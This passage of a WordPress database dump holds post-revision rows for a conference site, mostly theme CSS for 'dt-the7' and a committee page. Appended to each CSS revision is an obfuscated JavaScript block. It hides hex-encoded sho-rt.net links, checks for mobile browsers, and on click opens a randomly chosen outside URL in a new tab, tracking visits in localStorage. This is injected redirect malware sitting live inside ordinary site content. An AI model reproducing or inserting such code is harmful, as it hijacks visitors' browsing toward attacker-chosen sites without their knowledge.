_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-28 09:14:54','2023-06-28 09:14:54','',4849,'https://gsw2023.com/?p=4943',0,'revision','',0),
(4945,4,'2023-06-28 09:27:03','2023-06-28 09:27:03','#bottom-bar .wf-float-left{\n	display: none !important;\n}\n#bottom-bar .wf-float-right .bottom-text-block{\n	float: none !important;\n	width: 100% !important;\n	text-align: center !important;\n}\n\n\n.menu-text:hover{\n	cursor: pointer !important;\n}\n.zero-pad{\n	padding: 0 !important;\n}\n.zero-pad-deep, .zero-pad-deep *{\n	padding: 0 !important;\n}\n\n.zero-mar{\n	margin: 0 !important;\n}\n.zero-mar-deep, .zero-mar-deep *{\n	margin: 0 !important;\n}\n.full-width{\n	width:100% !important;\n}\n.center{\n	text-align: center !important;\n}\n.img_card_1{\n	width: 110px;\n	height: 150px;\n	object-fit: cover;\n	border-radius: 10px;\n}\n.img_card_2 img{\n	width: 150px;\n	height: 200px;\n	object-fit: cover;\n	border-radius: 10px;\n}\n\n\n.gsw_card *{\n	margin: 0;\n}\n.gsw_card a{\n	color: #4169e1;\n}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','dt-the7','','inherit','closed','closed','','4823-revision-v1','','','2023-06-28 09:27:03','2023-06-28 09:27:03','',4823,'https://gsw2023.com/?p=4945',0,'revision','',0),
(4947,4,'2023-06-28 09:28:25','2023-06-28 09:28:25','.menu-text:hover{\n	cursor: pointer !important;\n}\n.zero-pad{\n	padding: 0 !important;\n}\n.zero-pad-deep, .zero-pad-deep *{\n	padding: 0 !important;\n}\n\n.zero-mar{\n	margin: 0 !important;\n}\n.zero-mar-deep, .zero-mar-deep *{\n	margin: 0 !important;\n}\n.full-width{\n	width:100% !important;\n}\n.center{\n	text-align: center !important;\n}\n.img_card_1{\n	width: 110px;\n	height: 150px;\n	object-fit: cover;\n	border-radius: 10px;\n}\n.img_card_2 img{\n	width: 150px;\n	height: 200px;\n	object-fit: cover;\n	border-radius: 10px;\n}\n\n\n.gsw_card *{\n	margin: 0;\n}\n.gsw_card a{\n	color: #4169e1;\n}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','dt-the7','','inherit','closed','closed','','4823-revision-v1','','','2023-06-28 09:28:25','2023-06-28 09:28:25','',4823,'https://gsw2023.com/?p=4947',0,'revision','',0),
(4949,4,'2023-06-28 09:32:47','2023-06-28 09:32:47','.menu-text:hover{\n	cursor: pointer !important;\n}\n.zero-pad{\n	padding: 0 !important;\n}\n.zero-pad-deep, .zero-pad-deep *{\n	padding: 0 !important;\n}\n\n.zero-mar{\n	margin: 0 !important;\n}\n.zero-mar-deep, .zero-mar-deep *{\n	margin: 0 !important;\n}\n.full-width{\n	width:100% !important;\n}\n.center{\n	text-align: center !important;\n}\n.img_card_1{\n	width: 110px;\n	height: 150px;\n	object-fit: cover;\n	border-radius: 10px;\n}\n.img_card_2 img{\n	width: 150px;\n	height: 200px;\n	object-fit: cover;\n	border-radius: 10px;\n}\n\n\n.gsw_card, .gsw_card *{\n	margin: 0 !important;\n}\n.gsw_card a{\n	color: #4169e1 !important;\n}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const 